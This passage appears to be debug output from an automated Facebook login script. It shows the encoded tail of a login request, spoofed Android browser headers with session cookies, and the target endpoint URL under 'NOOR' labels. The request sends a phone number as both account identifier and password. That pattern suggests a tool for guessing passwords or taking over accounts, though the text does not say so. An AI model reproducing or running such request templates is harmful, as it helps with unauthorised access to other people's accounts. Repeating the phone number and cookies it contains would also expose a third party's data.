ogged_in_switcher%5C%22%3A0%2C%5C%22is_from_logged_out%5C%22%3A0%2C%5C%22access_flow_version%5C%22%3A%5C%22F2_FLOW%5C%22%7D%2C%5C%22client_input_params%5C%22%3A%7B%5C%22machine_id%5C%22%3A%5C%22%5C%22%2C%5C%22contact_point%5C%22%3A%5C%220176788143%5C%22%2C%5C%22password%5C%22%3A%5C%22%23PWD_BROWSER%3A0%3A1742403001%3A0176788143%5C%22%2C%5C%22accounts_list%5C%22%3A%5B%5D%2C%5C%22fb_ig_device_id%5C%22%3A%5B%5D%2C%5C%22secure_family_device_id%5C%22%3A%5C%22%5C%22%2C%5C%22encrypted_msisdn%5C%22%3A%5C%22%5C%22%2C%5C%22headers_infra_flow_id%5C%22%3A%5C%22%5C%22%2C%5C%22try_num%5C%22%3A1%2C%5C%22login_attempt_count%5C%22%3A1%2C%5C%22event_flow%5C%22%3A%5C%22login_manual%5C%22%2C%5C%22event_step%5C%22%3A%5C%22home_page%5C%22%2C%5C%22openid_tokens%5C%22%3A%7B%7D%2C%5C%22auth_secure_device_id%5C%22%3A%5C%22%5C%22%2C%5C%22client_known_key_hash%5C%22%3A%5C%22%5C%22%2C%5C%22has_whatsapp_installed%5C%22%3A0%2C%5C%22sso_token_map_json_string%5C%22%3A%5C%22%5C%22%2C%5C%22should_show_nested_nta_from_aymh%5C%22%3A0%2C%5C%22password_contains_non_ascii%5C%22%3A%5C%22false%5C%22%2C%5C%22has_granted_read_contacts_permissions%5C%22%3A0%2C%5C%22has_granted_read_phone_permissions%5C%22%3A0%2C%5C%22app_manager_id%5C%22%3A%5C%22%5C%22%2C%5C%22lois_settings%5C%22%3A%7B%5C%22lois_token%5C%22%3A%5C%22%5C%22%7D%7D%7D%22%7D
-------------------------------------------------------
~/ NOOR HEADERS : {'user-agent': 'Mozilla/5.0 (Linux; Android 7; Tab KingKong Build/PQ3A.261272.45413863) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.5468.50 Mobile Safari/537.36', 'accept-encoding': 'gzip, deflate, br, zstd', 'accept': '*/*', 'Connection': 'keep-alive', 'authority': 'touch.facebook.com', 'method': 'POST', 'path': '/async/wbloks/fetch/?appid=com.bloks.www.bloks.caa.login.async.send_login_request&type=action&__bkv=2c4733784ae1256fe36c8fac264a2939b8558cfc1bad5ac672c9bc60482cab5a', 'scheme': 'https', 'Content-Length': '3084', 'sec-ch-ua-full-version-list': '"Google Chrome";v="131.0.6778.261", "Chromium";v="131.0.6778.261", "Not_A Brand";v="24.0.0.0"', 'sec-ch-ua-platform': '"Android"', 'sec-ch-ua': '"Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"', 'sec-ch-ua-model': '11', 'sec-ch-ua-mobile': '?1', 'sec-ch-prefers-color-scheme': 'light', 'content-type': 'application/x-www-form-urlencoded;charset=UTF-8', 'sec-ch-ua-platform-version': '14.0.0', 'origin': 'https://touch.facebook.com', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'cors', 'sec-fetch-dest': 'empty', 'referer': 'https://touch.facebook.com/', 'accept-language': 'ur-PK,ur;q=0.9', 'priority': 'u=1, i', 'Cookie': 'datr=ufXaZy3NzPti6XfIPe_iHqMI; fr=0dd2dpbv6bxd71fyI..Bn2vW5..AAA.0.0.Bn2vW5.AWWPzUd6PHM; sb=ufXaZ56s82xLgy1wqZWRpIuw'}
-------------------------------------------------------
~/ NOOR URL : https://touch.facebook.com/async/wbloks/fetch/?appid=com.bloks.www.bloks.caa.login.async.send_login_request&type=action&__bkv=2c4733784ae1256fe36c8fac264a2939b8558cfc1bad5ac672c9bc60482cab5a&appid=com.bloks.www.bloks.caa.login.async.send_login_request&type=action&__bkv=2c4733784ae1256fe36c8fac264a2939b8558cfc1bad5ac672c9bc60482cab5a
-------------------------------------------------------